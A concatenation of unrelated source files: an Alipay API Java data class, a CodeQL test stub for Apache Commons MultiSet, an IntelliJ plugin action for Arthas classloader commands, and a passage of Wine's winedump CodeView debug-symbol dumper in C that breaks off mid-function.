package com.alipay.api.domain; import com.alipay.api.AlipayObject; import com.alipay.api.internal.mapping.ApiField; /** * 消费送信息列表 * * @author auto create * @since 1.0, 2016-11-24 22:26:22 */ public class ConsumeInfo extends AlipayObject { private static final long serialVersionUID = 7615267943956617366L; /** * 领取时间 */ @ApiField("taken_time") private String takenTime; /** * 用户名 */ @ApiField("user_name") private String userName; /** * 面额(单位分) */ @ApiField("voucher_amt") private String voucherAmt; public String getTakenTime() { return this.takenTime; } public void setTakenTime(String takenTime) { this.takenTime = takenTime; } public String getUserName() { return this.userName; } public void setUserName(String userName) { this.userName = userName; } public String getVoucherAmt() { return this.voucherAmt; } public void setVoucherAmt(String voucherAmt) { this.voucherAmt = voucherAmt; } }
475
4,036
<filename>java/ql/test/stubs/apache-commons-collections4-4.4/org/apache/commons/collections4/MultiSet.java // Generated automatically from org.apache.commons.collections4.MultiSet for testing purposes package org.apache.commons.collections4; import java.util.Collection; import java.util.Iterator; import java.util.Set; public interface MultiSet<E> extends Collection<E> { Iterator<E> iterator(); Set<E> uniqueSet(); Set<MultiSet.Entry<E>> entrySet(); boolean add(E p0); boolean containsAll(Collection<? extends Object> p0); boolean equals(Object p0); boolean remove(Object p0); boolean removeAll(Collection<? extends Object> p0); boolean retainAll(Collection<? extends Object> p0); int add(E p0, int p1); int getCount(Object p0); int hashCode(); int remove(Object p0, int p1); int setCount(E p0, int p1); int size(); static public interface Entry<E> { E getElement(); boolean equals(Object p0); int getCount(); int hashCode(); } }
384
364
package com.github.wangji92.arthas.plugin.action.arthas; import com.github.wangji92.arthas.plugin.utils.ClipboardUtils; import com.github.wangji92.arthas.plugin.utils.NotifyUtils; import com.intellij.openapi.actionSystem.AnAction; import com.intellij.openapi.actionSystem.AnActionEvent; import com.intellij.openapi.actionSystem.CommonDataKeys; import com.intellij.openapi.actionSystem.DataContext; import com.intellij.openapi.project.Project; import org.jetbrains.annotations.NotNull; /** * classloader 使用 * <p> * classloader -t 继承tree * classloader -l 按类加载实例查看统计信息 * classloader -c 327a647b 查看URLClassLoader实际的urls * classloader -c 327a647b -r java/lang/String.class 使用ClassLoader去查找资源 * classloader -a 所有加载的类的信息 * classloader -a -c 327a647b 当前classloader 加载类的信息 * classloader -c 659e0bfd --load demo.MathGame 使用这个classloader 去加载类 * * @author 汪小哥 * @date 20-06-2020 */ public class ArthasClassloaderCommandAction extends AnAction { @Override public void actionPerformed(@NotNull AnActionEvent event) { DataContext dataContext = event.getDataContext(); Project project = CommonDataKeys.PROJECT.getData(dataContext); if (project == null) { return; } ClipboardUtils.setClipboardString("classloader -l"); NotifyUtils.notifyMessageDefault(project); } }
595
686
/* * MS debug info dumping utility * * Copyright 2006 <NAME> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA */ #include "config.h" #include "wine/port.h" #include <stdlib.h> #include <stdarg.h> #include <stdio.h> #ifdef HAVE_UNISTD_H # include <unistd.h> #endif #include <time.h> #ifdef HAVE_SYS_TYPES_H # include <sys/types.h> #endif #ifdef HAVE_SYS_STAT_H # include <sys/stat.h> #endif #ifdef HAVE_SYS_MMAN_H #include <sys/mman.h> #endif #include <fcntl.h> #include "windef.h" #include "winbase.h" #include "winedump.h" #include "wine/mscvpdb.h" #define PSTRING(adr, ofs) \ ((const struct p_string*)((const char*)(adr) + (ofs))) static const char* p_string(const struct p_string* s) { static char tmp[256 + 1]; memcpy(tmp, s->name, s->namelen); tmp[s->namelen] = '\0'; return tmp; } struct full_value { enum {fv_integer, fv_longlong} type; union { int i; long long unsigned llu; } v; }; static int full_numeric_leaf(struct full_value* fv, const unsigned short int* leaf) { unsigned short int type = *leaf++; int length = 2; fv->type = fv_integer; if (type < LF_NUMERIC) { fv->v.i = type; } else { switch (type) { case LF_CHAR: length += 1; fv->v.i = *(const char*)leaf; break; case LF_SHORT: length += 2; fv->v.i = *(const short*)leaf; break; case LF_USHORT: length += 2; fv->v.i = *leaf; break; case LF_LONG: length += 4; fv->v.i = *(const int*)leaf; break; case LF_ULONG: length += 4; fv->v.i = *(const unsigned int*)leaf; break; case LF_QUADWORD: length += 8; fv->type = fv_longlong; fv->v.llu = *(const long long int*)leaf; break; case LF_UQUADWORD: length += 8; fv->type = fv_longlong; fv->v.llu = *(const long long unsigned int*)leaf; break; case LF_REAL32: length += 4; printf(">>> unsupported leaf value %04x\n", type); fv->v.i = 0; /* FIXME */ break; case LF_REAL48: length += 6; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_REAL64: length += 8; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_REAL80: length += 10; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_REAL128: length += 16; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_COMPLEX32: length += 4; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_COMPLEX64: length += 8; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_COMPLEX80: length += 10; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_COMPLEX128: length += 16; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; case LF_VARSTRING: length += 2 + *leaf; fv->v.i = 0; /* FIXME */ printf(">>> unsupported leaf value %04x\n", type); break; default: printf(">>> Unsupported numeric leaf-id %04x\n", type); fv->v.i = 0; break; } } return length; } static const char* full_value_string(const struct full_value* fv) { static char tmp[128]; switch (fv->type) { case fv_integer: sprintf(tmp, "0x%x", fv->v.i); break; case fv_longlong: sprintf(tmp, "0x%x%08x", (unsigned)(fv->v.llu >> 32), (unsigned)fv->v.llu); break; } return tmp; } static int numeric_leaf(int* value, const unsigned short int* leaf) { struct full_value fv; int len = full_numeric_leaf(&fv, leaf); switch (fv.type) { case fv_integer: *value = fv.v.i; break; case fv_longlong: *value = (unsigned)fv.v.llu; printf("bad conversion\n"); break; default: assert( 0 ); *value = 0; } return len; } static const char* get_attr(unsigned attr) { static char tmp[256]; switch (attr & 3) { case 0: strcpy(tmp, ""); break; case 1: strcpy(tmp, "private "); break; case 2: strcpy(tmp, "protected "); break; case 3: strcpy(tmp, "public "); break; } switch ((attr >> 2) & 7) { case 0: strcat(tmp, ""); break; case 1: strcat(tmp, "virtual "); break; case 2: strcat(tmp, "static "); break; case 3: strcat(tmp, "friend "); break; case 4: strcat(tmp, "introducing virtual "); break; case 5: strcat(tmp, "pure virtual "); break; case 6: strcat(tmp, "pure introducing virtual "); break; case 7: strcat(tmp, "reserved "); break; } if ((attr >> 5) & 1) strcat(tmp, "pseudo "); if ((attr >> 6) & 1) strcat(tmp, "no-inherit "); if ((attr >> 7) & 1) strcat(tmp, "no-construct "); return tmp; } static const char* get_property(unsigned prop) { static char tmp[1024]; unsigned pos = 0; if (!prop) return "none"; #define X(s) {if (pos) tmp[pos++] = ';'; strcpy(tmp + pos, s); pos += strlen(s);} if (prop & 0x0001) X("packed"); if (prop & 0x0002) X("w/{cd}tor"); if (prop & 0x0004) X("w/overloaded-ops"); if (prop & 0x0008) X("nested-class"); if (prop & 0x0010) X("has-nested-classes"); if (prop & 0x0020) X("w/overloaded-assign"); if (prop & 0x0040) X("w/casting-methods"); if (prop & 0x0080) X("forward"); if (prop & 0x0100) X("scoped"); #undef X if (prop & ~0x01FF) pos += sprintf(tmp, "unk%x", prop & ~0x01FF); else tmp[pos] = '\0'; assert(pos < sizeof(tmp)); return tmp; } static void do_field(const unsigned char* start, const unsigned char* end) { /* * A 'field list' is a CodeView-specific data type which doesn't * directly correspond to any high-level data type. It is used * to hold the collection of members of a struct, class, union * or enum type. The actual definition of that type will follow * later, and refer to the field list definition record. * * As we don't have a field list type ourselves, we look ahead * in the field list to try to find out whether this field list * will be used for an enum or struct type, and create a dummy * type of the corresponding sort. Later on, the definition of * the 'real' type will copy the member / enumeration data. */ const unsigned char* ptr = start; const char* cstr; const struct p_string* pstr; int leaf_len, value; while (ptr < end) { const union codeview_fieldtype* fieldtype = (const union codeview_fieldtype*)ptr; if (*ptr >= 0xf0) /* LF_PAD... */ { ptr +=* ptr & 0x0f; continue; } switch (fieldtype->generic.id) { case LF_ENUMERATE_V1: leaf_len = numeric_leaf(&value, &fieldtype->enumerate_v1.value); pstr = PSTRING(&fieldtype->enumerate_v1.value, leaf_len); printf("\t\tEnumerate V1: '%s' value:%d\n", p_string(pstr), value); ptr += 2 + 2 + leaf_len + 1 + pstr->namelen; break; case LF_ENUMERATE_V3: leaf_len = numeric_leaf(&value, &fieldtype->enumerate_v3.value); cstr = (const char*)&fieldtype->enumerate_v3.value + leaf_len; printf("\t\tEnumerate V3: '%s' value:%d\n", cstr, value); ptr += 2 + 2 + leaf_len + strlen(cstr) + 1; break; case LF_MEMBER_V1: leaf_len = numeric_leaf(&value, &fieldtype->member_v1.offset); pstr = PSTRING(&fieldtype->member_v1.offset, leaf_len); printf("\t\tMember V1: '%s' type:%x attr:%s @%d\n", p_string(pstr), fieldtype->member_v1.type, get_attr(fieldtype->member_v1.attribute), value); ptr += 2 + 2 + 2 + leaf_len + 1 + pstr->namelen; break; case LF_MEMBER_V2: leaf_len = numeric_leaf(&value, &fieldtype->member_v2.offset); pstr = PSTRING(&fieldtype->member_v2.offset, leaf_len); printf("\t\tMember V2: '%s' type:%x attr:%s @%d\n", p_string(pstr), fieldtype->member_v2.type, get_attr(fieldtype->member_v2.attribute), value); ptr += 2 + 2 + 4 + leaf_len + 1 + pstr->namelen; break; case LF_MEMBER_V3: leaf_len = numeric_leaf(&value, &fieldtype->member_v3.offset); cstr = (const char*)&fieldtype->member_v3.offset + leaf_len; printf("\t\tMember V3: '%s' type:%x attr:%s @%d\n", cstr, fieldtype->member_v3.type, get_attr(fieldtype->member_v3.attribute), value); ptr += 2 + 2 + 4 + leaf_len + strlen(cstr) + 1; break; case LF_ONEMETHOD_V1: switch ((fieldtype->onemethod_v1.attribute >> 2) & 7) { case 4: case 6: printf("\t\tVirtual-method V1: '%s' attr:%s type:%x vtable_offset:%u\n", p_string(&fieldtype->onemethod_virt_v1.p_name), get_attr(fieldtype->onemethod_virt_v1.attribute), fieldtype->onemethod_virt_v1.type, fieldtype->onemethod_virt_v1.vtab_offset); ptr += 2 + 2 + 2 + 4 + (1 + fieldtype->onemethod_virt_v1.p_name.namelen); break; default: printf("\t\tMethod V1: '%s' attr:%s type:%x\n", p_string(&fieldtype->onemethod_v1.p_name), get_attr(fieldtype->onemethod_v1.attribute), fieldtype->onemethod_v1.type); ptr += 2 + 2 + 2 + (1 + fieldtype->onemethod_v1.p_name.namelen); break; } break; case LF_ONEMETHOD_V2: switch ((fieldtype->onemethod_v2.attribute >> 2) & 7) { case 4: case 6: printf("\t\tVirtual-method V2: '%s' attr:%s type:%x vtable_offset:%u\n", p_string(&fieldtype->onemethod_virt_v2.p_name), get_attr(fieldtype->onemethod_virt_v2.attribute), fieldtype->onemethod_virt_v2.type, fieldtype->onemethod_virt_v2.vtab_offset); ptr += 2 + 2 + 4 + 4 + (1 + fieldtype->onemethod_virt_v2.p_name.namelen); break; default: printf("\t\tMethod V2: '%s' attr:%s type:%x\n", p_string(&fieldtype->onemethod_v2.p_name), get_attr(fieldtype->onemethod_v2.attribute), fieldtype->onemethod_v2.type); ptr += 2 + 2 + 4 + (1 + fieldtype->onemethod_v2.p_name.namelen); break; } break; case LF_ONEMETHOD_V3: switch ((fieldtype->onemethod_v3.attribute >> 2) & 7) { case 4: case 6: printf("\t\tVirtual-method V3: '%s' attr:%s type:%x vtable_offset:%u\n", fieldtype->onemethod_virt_v3.name, get_attr(fieldtype->onemethod_virt_v3.attribute), fieldtype->onemethod_virt_v3.type, fieldtype->onemethod_virt_v3.vtab_offset); ptr += 2 + 2 + 4 + 4 + (strlen(fieldtype->onemethod_virt_v3.name) + 1); break; default: printf("\t\tMethod V3: '%s' attr:%s type:%x\n", fieldtype->onemethod_v3.name, get_attr(fieldtype->onemethod_v3.attribute), fieldtype->onemethod_v3.type); ptr += 2 + 2 + 4 + (strlen(fieldtype->onemethod_v3.name) + 1); break; } break; case LF_METHOD_V1: printf("\t\tMethod V1: '%s' overloaded=#%d method-list=%x\n", p_string(&fieldtype->method_v1.p_name), fieldtype->method_v1.count, fieldtype->method_v1.mlist); ptr += 2 + 2 + 2 + (1 + fieldtype->method_v1.p_name.namelen); break; case LF_METHOD_V2: printf("\t\tMethod V2: '%s' overloaded=#%d method-list=%x\n", p_string(&fieldtype->method_v2.p_name), fieldtype->method_v2.count, fieldtype->method_v2.mlist); ptr += 2 + 2 + 4 + (1 + fieldtype->method_v2.p_name.namelen); break; case LF_METHOD_V3: printf("\t\tMethod V3: '%s' overloaded=#%d method-list=%x\n", fieldtype->method_v3.name, fieldtype->method_v3.count, fieldtype->method_v3.mlist); ptr += 2 + 2 + 4 + (strlen(fieldtype->method_v3.name) + 1); break; case LF_STMEMBER_V1: printf("\t\tStatic member V1: '%s' attr:%s type:%x\n", p_string(&fieldtype->stmember_v1.p_name), get_attr(fieldtype->stmember_v1.attribute), fieldtype->stmember_v1.type); ptr += 2 + 2 + 2 + (1 + fieldtype->stmember_v1.p_name.namelen); break; case LF_STMEMBER_V2: printf("\t\tStatic member V2: '%s' attr:%s type:%x\n", p_string(&fieldtype->stmember_v2.p_name), get_attr(fieldtype->stmember_v2.attribute), fieldtype->stmember_v2.type); ptr += 2 + 2 + 4 + (1 + fieldtype->stmember_v2.p_name.namelen); break; case LF_STMEMBER_V3: printf("\t\tStatic member V3: '%s' attr:%s type:%x\n", fieldtype->stmember_v3.name, get_attr(fieldtype->stmember_v3.attribute), fieldtype->stmember_v3.type); ptr += 2 + 2 + 4 + (strlen(fieldtype->stmember_v3.name) + 1); break; case LF_FRIENDFCN_V1: printf("\t\tFriend function V1: '%s' type:%x\n", p_string(&fieldtype->friendfcn_v1.p_name), fieldtype->friendfcn_v1.type); break; case LF_FRIENDFCN_V2: printf("\t\tFriend function V2: '%s' type:%x\n", p_string(&fieldtype->friendfcn_v2.p_name), fieldtype->friendfcn_v2.type); break; #if 0 case LF_FRIENDFCN_V3: printf("\t\tFriend function V3: '%s' type:%x\n", fieldtype->friendfcn_v3.name, fieldtype->friendfcn_v3.type); break; #endif case LF_BCLASS_V1: leaf_len = numeric_leaf(&value, &fieldtype->bclass_v1.offset); printf("\t\tBase class V1: type:%x attr:%s @%d\n", fieldtype->bclass_v1.type, get_attr(fieldtype->bclass_v1.attribute), value); ptr += 2 + 2 + 2 + leaf_len; break; case LF_BCLASS_V2: leaf_len = numeric_leaf(&value, &fieldtype->bclass_v2.offset); printf("\t\tBase class V2: type:%x attr:%s @%d\n", fieldtype->bclass_v2.type, get_attr(fieldtype->bclass_v2.attribute), value); ptr += 2 + 2 + 4 + leaf_len; break; case LF_VBCLASS_V1: case LF_IVBCLASS_V1: leaf_len = numeric_leaf(&value, &fieldtype->vbclass_v1.vbpoff); printf("\t\t%sirtual base class V1: type:%x (ptr:%x) attr:%s vbpoff:%d ", (fieldtype->generic.id == LF_VBCLASS_V2) ? "V" : "Indirect v", fieldtype->vbclass_v1.btype, fieldtype->vbclass_v1.vbtype, get_attr(fieldtype->vbclass_v1.attribute), value); ptr += 2 + 2 + 2 + 2 + leaf_len; leaf_len = numeric_leaf(&value, (const unsigned short*)ptr); printf("vboff:%d\n", value); ptr += leaf_len; break; case LF_VBCLASS_V2: case LF_IVBCLASS_V2: leaf_len = numeric_leaf(&value, &fieldtype->vbclass_v1.vbpoff); printf("\t\t%sirtual base class V2: type:%x (ptr:%x) attr:%s vbpoff:%d ", (fieldtype->generic.id == LF_VBCLASS_V2) ? "V" : "Indirect v", fieldtype->vbclass_v2.btype, fieldtype->vbclass_v2.vbtype, get_attr(fieldtype->vbclass_v2.attribute), value); ptr += 2 + 2 + 4 + 4 + leaf_len; leaf_len = numeric_leaf(&value, (const unsigned short*)ptr); printf("vboff:%d\n", value); ptr += leaf_len; break; case LF_FRIENDCLS_V1: printf("\t\tFriend class V1: type:%x\n", fieldtype->friendcls_v1.type); break; case LF_FRIENDCLS_V2: printf("\t\tFriend class V2: type:%x\n", fieldtype->friendcls_v2.type); break; case LF_NESTTYPE_V1: printf("\t\tNested type V1: '%s' type:%x\n", p_string(&fieldtype->nesttype_v1.p_name), fieldtype->nesttype_v1.type); ptr += 2 + 2 + (1 + fieldtype->nesttype_v1.p_name.namelen); break; case LF_NESTTYPE_V2: printf("\t\tNested type V2: '%s' pad0:%u type:%x\n", p_string(&fieldtype->nesttype_v2.p_name), fieldtype->nesttype_v2._pad0, fieldtype->nesttype_v2.type); ptr += 2 + 2 + 4 + (1 + fieldtype->nesttype_v2.p_name.namelen); break; case LF_NESTTYPE_V3: printf("\t\tNested type V3: '%s' pad0:%u type:%x\n", fieldtype->nesttype_v3.name, fieldtype->nesttype_v3._pad0, fieldtype->nesttype_v3.type); ptr += 2 + 2 + 4 + (strlen(fieldtype->nesttype_v3.name) + 1); break; case LF_VFUNCTAB_V1: printf("\t\tVirtual function table V1: type:%x\n", fieldtype->vfunctab_v1.type); ptr += 2 + 2; break; case LF_VFUNCTAB_V2: printf("\t\tVirtual function table V2: type:%x\n", fieldtype->vfunctab_v2.type); ptr += 2 + 2 + 4; break; case LF_VFUNCOFF_V1: printf("\t\tVirtual function table offset V1: type:%x offset:%x\n", fieldtype->vfuncoff_v1.type, fieldtype->vfuncoff_v1.offset); break; case LF_VFUNCOFF_V2: printf("\t\tVirtual function table offset V2: type:%x offset:%x\n", fieldtype->vfuncoff_v2.type, fieldtype->vfuncoff_v2.offset); break; default: printf(">>> Unsupported field-id %x\n", fieldtype->generic.id); dump_data((const void*)fieldtype, 0x30, "\t"); break; } } } static void codeview_dump_one_type(unsigned curr_type, const union codeview_type* type) { const union codeview_reftype* reftype = (const union codeview_reftype*)type; int i, leaf_len, value; unsigned int j; const char* str; switch (type->generic.id) { case LF_POINTER_V1: printf("\t%x => Pointer V1 to type:%x\n", curr_type, type->pointer_v1.datatype); break; case LF_POINTER_V2: printf("\t%x => Pointer V2 to type:%x\n", curr_type, type->pointer_v2.datatype); break; case LF_ARRAY_V1: leaf_len = numeric_leaf(&value, &type->array_v1.arrlen); printf("\t%x => Array V1-'%s'[%u type:%x] type:%x\n", curr_type, p_string(PSTRING(&type->array_v1.arrlen, leaf_len)), value, type->array_v1.idxtype, type->array_v1.elemtype); break; case LF_ARRAY_V2: leaf_len = numeric_leaf(&value, &type->array_v2.arrlen); printf("\t%x => Array V2-'%s'[%u type:%x] type:%x\n", curr_type, p_string(PSTRING(&type->array_v2.arrlen, leaf_len)), value, type->array_v2.idxtype, type->array_v2.elemtype); break; case LF_ARRAY_V3: leaf_len = numeric_leaf(&value, &type->array_v3.arrlen); str = (const char*)&type->array_v3.arrlen + leaf_len; printf("\t%x => Array V3-'%s'[%u type:%x] type:%x\n", curr_type, str, value, type->array_v3.idxtype, type->array_v3.elemtype); break; /* a bitfields is a CodeView specific data type which represent a bitfield * in a structure or a class. For now, we store it in a SymTag-like type * (so that the rest of the process is seamless), but check at udt inclusion * type for its presence */ case LF_BITFIELD_V1: printf("\t%x => Bitfield V1:%x offset:%u #bits:%u\n", curr_type, reftype->bitfield_v1.type, reftype->bitfield_v1.bitoff, reftype->bitfield_v1.nbits); break; case LF_BITFIELD_V2: printf("\t%x => Bitfield V2:%x offset:%u #bits:%u\n", curr_type, reftype->bitfield_v2.type, reftype->bitfield_v2.bitoff, reftype->bitfield_v2.nbits); break; case LF_FIELDLIST_V1: case LF_FIELDLIST_V2: printf("\t%x => Fieldlist\n", curr_type); do_field(reftype->fieldlist.list, (const BYTE*)type + reftype->generic.len + 2); break; case LF_STRUCTURE_V1: case LF_CLASS_V1: leaf_len = numeric_leaf(&value, &type->struct_v1.structlen); printf("\t%x => %s V1 '%s' elts:%u property:%s fieldlist-type:%x derived-type:%x vshape:%x size:%u\n", curr_type, type->generic.id == LF_CLASS_V1 ? "Class" : "Struct", p_string(PSTRING(&type->struct_v1.structlen, leaf_len)), type->struct_v1.n_element, get_property(type->struct_v1.property), type->struct_v1.fieldlist, type->struct_v1.derived, type->struct_v1.vshape, value); break; case LF_STRUCTURE_V2: case LF_CLASS_V2: leaf_len = numeric_leaf(&value, &type->struct_v2.structlen); printf("\t%x => %s V2 '%s' elts:%u property:%s\n" " fieldlist-type:%x derived-type:%x vshape:%x size:%u\n", curr_type, type->generic.id == LF_CLASS_V2 ? "Class" : "Struct", p_string(PSTRING(&type->struct_v2.structlen, leaf_len)), type->struct_v2.n_element, get_property(type->struct_v2.property), type->struct_v2.fieldlist, type->struct_v2.derived, type->struct_v2.vshape, value); break; case LF_STRUCTURE_V3: case LF_CLASS_V3: leaf_len = numeric_leaf(&value, &type->struct_v3.structlen); str = (const char*)&type->struct_v3.structlen + leaf_len; printf("\t%x => %s V3 '%s' elts:%u property:%s\n" " fieldlist-type:%x derived-type:%x vshape:%x size:%u\n", curr_type, type->generic.id == LF_CLASS_V3 ? "Class" : "Struct", str, type->struct_v3.n_element, get_property(type->struct_v3.property), type->struct_v3.fieldlist, type->struct_v3.derived, type->struct_v3.vshape, value); break; case LF_UNION_V1: leaf_len = numeric_leaf(&value, &type->union_v1.un_len); printf("\t%x => Union V1 '%s' count:%u property:%s fieldlist-type:%x size:%u\n", curr_type, p_string(PSTRING(&type->union_v1.un_len, leaf_len)), type->union_v1.count, get_property(type->union_v1.property), type->union_v1.fieldlist, value); break; case LF_UNION_V2: leaf_len = numeric_leaf(&value, &type->union_v2.un_len); printf("\t%x => Union V2 '%s' count:%u property:%s fieldlist-type:%x size:%u\n", curr_type, p_string(PSTRING(&type->union_v2.un_len, leaf_len)), type->union_v2.count, get_property(type->union_v2.property), type->union_v2.fieldlist, value); break; case LF_UNION_V3: leaf_len = numeric_leaf(&value, &type->union_v3.un_len); str = (const char*)&type->union_v3.un_len + leaf_len; printf("\t%x => Union V3 '%s' count:%u property:%s fieldlist-type:%x size:%u\n", curr_type, str, type->union_v3.count, get_property(type->union_v3.property), type->union_v3.fieldlist, value); break; case LF_ENUM_V1: printf("\t%x => Enum V1 '%s' type:%x field-type:%x count:%u property:%s\n", curr_type, p_string(&type->enumeration_v1.p_name), type->enumeration_v1.type, type->enumeration_v1.fieldlist, type->enumeration_v1.count, get_property(type->enumeration_v1.property)); break; case LF_ENUM_V2: printf("\t%x => Enum V2 '%s' type:%x field-type:%x count:%u property:%s\n", curr_type, p_string(&type->enumeration_v2.p_name), type->enumeration_v2.type, type->enumeration_v2.fieldlist, type->enumeration_v2.count, get_property(type->enumeration_v2.property)); break; case LF_ENUM_V3: printf("\t%x => Enum V3 '%s' type:%x field-type:%x count:%u property:%s\n", curr_type, type->enumeration_v3.name, type->enumeration_v3.type, type->enumeration_v3.fieldlist, type->enumeration_v3.count, get_property(type->enumeration_v3.property)); break; case LF_ARGLIST_V1: printf("\t%x => Arglist V1(#%u):", curr_type, reftype->arglist_v1.num); for (i = 0; i < reftype->arglist_v1.num; i++) { printf(" %x", reftype->arglist_v1.args[i]); } printf("\n"); break; case LF_ARGLIST_V2: printf("\t%x => Arglist V2(#%u):", curr_type, reftype->arglist_v2.num); for (j = 0; j < reftype->arglist_v2.num; j++) { printf("\t %x", reftype->arglist_v2.args[j]); } printf("\t\n"); break; case LF_PROCEDURE_V1: /* FIXME: unknown could be the calling convention for the proc */ printf("\t%x => Procedure V1 ret_type:%x call:%x (#%u args_type:%x)\n", curr_type, type->procedure_v1.rvtype, type->procedure_v1.call, type->procedure_v1.params, type->procedure_v1.arglist); break; case LF_PROCEDURE_V2: printf("\t%x => Procedure V2 ret_type:%x unk:%x (#%u args_type:%x)\n", curr_type, type->procedure_v2.rvtype, type->procedure_v2.call, type->procedure_v2.params, type->procedure_v2.arglist); break; case LF_MFUNCTION_V2: printf("\t%x => MFunction V2 ret-type:%x call:%x class-type:%x this-type:%x\n" "\t\t#args:%x args-type:%x this_adjust:%x\n", curr_type, type->mfunction_v2.rvtype, type->mfunction_v2.call, type->mfunction_v2.class_type, type->mfunction_v2.this_type, type->mfunction_v2.params, type->mfunction_v2.arglist, type->mfunction_v2.this_adjust); break; case LF_MODIFIER_V1: printf("\t%x => Modifier V1 type:%x modif:%x\n", curr_type, type->modifier_v1.type, type->modifier_v1.attribute); break; case LF_MODIFIER_V2: printf("\t%x => Modifier V2 type:%x modif:%x\n", curr_type, type->modifier_v2.type, type->modifier_v2.attribute); break; case LF_METHODLIST_V1: { const unsigned short* pattr = (const unsigned short*)((const char*)type + 4); printf("\t%x => Method list\n", curr_type); while ((const char*)pattr < (const char*)type + type->generic.len + 2) { switch ((*pattr >> 2) & 7) { case 4: case 6: printf("\t\t\tattr:%s type:%x vtab-offset:%x\n", get_attr(pattr[0]), pattr[1], *(const unsigned*)(&pattr[2])); pattr += 3; break; default: printf("\t\t\tattr:%s type:%x\n", get_attr(pattr[0]), pattr[1]); pattr += 2; } } } break; case LF_METHODLIST_V2: { const unsigned* pattr = (const unsigned*)((const char*)type + 4); printf("\t%x => Method list\n", curr_type); while ((const char*)pattr < (const char*)type + type->generic.len + 2) { switch ((*pattr >> 2) & 7) { case 4: case 6: printf("\t\t\tattr:%s type:%x vtab-offset:%x\n", get_attr(pattr[0]), pattr[1], pattr[2]); pattr += 3; break; default: printf("\t\t\tattr:%s type:%x\n", get_attr(pattr[0]), pattr[1]); pattr += 2; } } } break; case LF_VTSHAPE_V1: { int count = *(const unsigned short*)((const char*)type + 4); int shift = 0; const char* ptr = (const char*)type + 6; const char* desc[] = {"Near", "Far", "Thin", "Disp to outermost", "Pointer to metaclass", "Near32", "Far32"}; printf("\t%x => VT Shape #%d: ", curr_type, count); while (count--) { if (((*ptr << shift) & 0xF) <= 6) printf("%s ", desc[(*ptr << shift) & 0xF]); else printf("%x ", (*ptr << shift) & 0xF); if (shift == 0) shift = 4; else {shift = 0; ptr++;} } printf("\n"); } break; case LF_DERIVED_V1: printf("\t%x => Derived V1(#%u):", curr_type, reftype->derived_v1.num); for (i = 0; i < reftype->derived_v1.num; i++) { printf(" %x", reftype->derived_v1.drvdcls[i]); } printf("\n"); break; case LF_DERIVED_V2: printf("\t%x => Derived V2(#%u):", curr_type, reftype->derived_v2.num); for (j = 0; j < reftype->derived_v2.num; j++) { printf(" %x", reftype->derived_v2.drvdcls[j]); } printf("\n"); break; default: printf(">>> Unsupported type-id %x for %x\n", type->generic.id, curr_type); dump_data((const void*)type, type->generic.len + 2, ""); break; } } BOOL codeview_dump_types_from_offsets(const void* table, const DWORD* offsets, unsigned num_types) { unsigned long i; for (i = 0; i < num_types; i++) { codeview_dump_one_type(0x1000 + i, (const union codeview_type*)((const char*)table + offsets[i])); } return TRUE; } BOOL codeview_dump_types_from_block(const void* table, unsigned long len) { unsigned int curr_type = 0x1000; const unsigned char*ptr = table; while (ptr - (const unsigned char*)table < len) { const union codeview_type* type = (const union codeview_type*)ptr; codeview_dump_one_type(curr_type, type); curr_type++; ptr += (type->generic.len + 2 + 3) & ~3; } return TRUE; } BOOL codeview_dump_symbols(const void* root, unsigned long size) { unsigned int i; int length; char* curr_func = NULL; int nest_block = 0; /* * Loop over the different types of records and whenever we * find something we are interested in, record it and move on. */ for (i = 0; i < size; i += length) { const union codeview_symbol* sym = (const union codeview_symbol*)((const char*)root + i); length = sym->generic.len + 2; if (!sym->generic.id || length < 4) break; switch (sym->generic.id) { /* * Global and local data symbols. We don't associate these * with any given source file. */ case S_GDATA_V2: case S_LDATA_V2: printf("\tS-%s-Data V2 '%s' %04x:%08x type:%08x\n", sym->generic.id == S_GDATA_V2 ? "Global" : "Local", get_symbol_str(p_string(&sym->data_v2.p_name)), sym->data_v2.segment, sym->data_v2.offset, sym->data_v2.symtype); break; case S_LDATA_V3: case S_GDATA_V3: /* EPP case S_DATA_V3: */ printf("\tS-%s-Data V3 '%s' (%04x:%08x) type:%08x\n", sym->generic.id == S_GDATA_V3 ? "Global" : "Local", get_symbol_str(sym->data_v3.name), sym->data_v3.segment, sym->data_v3.offset, sym->data_v3.symtype); break; case S_PUB_V2: printf("\tS-Public V2 '%s' %04x:%08x type:%08x\n", get_symbol_str(p_string(&sym->public_v2.p_name)), sym->public_v2.segment, sym->public_v2.offset, sym->public_v2.symtype); break; case S_PUB_V3: /* not completely sure of those two anyway */ case S_PUB_FUNC1_V3: case S_PUB_FUNC2_V3: printf("\tS-Public%s V3 '%s' %04x:%08x type:%08x\n", sym->generic.id == S_PUB_V3 ? "" : (sym->generic.id == S_PUB_FUNC1_V3 ? "<subkind1" : "<subkind2"), get_symbol_str(sym->public_v3.name), sym->public_v3.segment, sym->public_v3.offset, sym->public_v3.symtype); break; /* * Sort of like a global function, but it just points * to a thunk, which is a stupid name for what amounts to * a PLT slot in the normal jargon that everyone else uses. */ case S_THUNK_V1: printf("\tS-Thunk V1 '%s' (%04x:%08x#%x) type:%x\n", p_string(&sym->thunk_v1.p_name), sym->thunk_v1.segment, sym->thunk_v1.offset, sym->thunk_v1.thunk_len, sym->thunk_v1.thtype); curr_func = strdup(p_string(&sym->thunk_v1.p_name)); break; case S_THUNK_V3: printf("\tS-Thunk V3 '%s' (%04x:%08x#%x) type:%x\n", sym->thunk_v3.name, 